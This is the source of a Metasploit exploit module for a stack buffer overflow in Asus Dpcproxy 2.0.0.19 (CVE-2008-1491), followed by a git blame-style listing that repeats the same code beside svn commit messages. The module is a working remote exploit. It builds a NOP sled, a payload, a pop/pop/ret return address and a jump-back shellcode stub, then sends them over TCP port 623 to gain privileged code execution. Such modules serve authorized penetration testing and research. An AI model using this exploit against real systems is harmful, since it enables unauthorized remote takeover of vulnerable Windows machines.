metasploit-framework/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Asus Dpcproxy Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.
					It should be vulnerable until version 2.0.0.24.
					Credit to Luigi Auriemma
			},
			'Author'         => 'Jacopo Cervini',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2008-1491' ],
					[ 'OSVDB', '43638' ],
					[ 'BID', '28394' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Asus Dpcroxy version 2.00.19 Universal',     { 'Ret' => 0x0040273b } ], # p/p/r
				],
			'Privileged'     => true,
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 21 2008'))

		register_options([Opt::RPORT(623)], self.class)

	end

	def exploit
		connect

		sploit =   make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)
		sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
		sploit << [target.ret].pack('V') +  make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back
		sploit << make_nops(50)

		print_status("Trying target #{target.name}...")
		sock.put(sploit)
		select(nil,nil,nil,3) # =(

		handler
		disconnect
	end

end
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`##`
			`# $Id$`
			`##`

			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Asus Dpcproxy Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`It should be vulnerable until version 2.0.0.24.`
			`Credit to Luigi Auriemma`
			`},`
			`'Author' => 'Jacopo Cervini',`
			`'Version' => '$Revision$',`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'References' =>`
			`[`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00			`[ 'CVE', '2008-1491' ],`
			`[ 'OSVDB', '43638' ],`
			`[ 'BID', '28394' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r`
			`],`
			`'Privileged' => true,`
			`'DefaultTarget' => 0,`
various fixes, mostly consistency changes to disclosure dates git-svn-id: file:///home/svn/framework3/trunk@9525 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-15 07:18:08 +00:00			`'DisclosureDate' => 'Mar 21 2008'))`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`register_options([Opt::RPORT(623)], self.class)`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`end`

			`def exploit`
			`connect`

			`sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)`
			`sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)`
			`sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back`
			`sploit << make_nops(50)`

			`print_status("Trying target #{target.name}...")`
			`sock.put(sploit)`
Fixes #2134. Subs select for sleep in exploit modules. git-svn-id: file:///home/svn/framework3/trunk@9583 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,3) # =(`
get rid of some more ^Ms git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-15 18:47:29 +00:00
			`handler`
			`disconnect`
			`end`

More osvdb references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@6550 4d416f70-5f16-0410-b530-b9f4589650da 2009-05-13 17:39:42 +00:00			`end`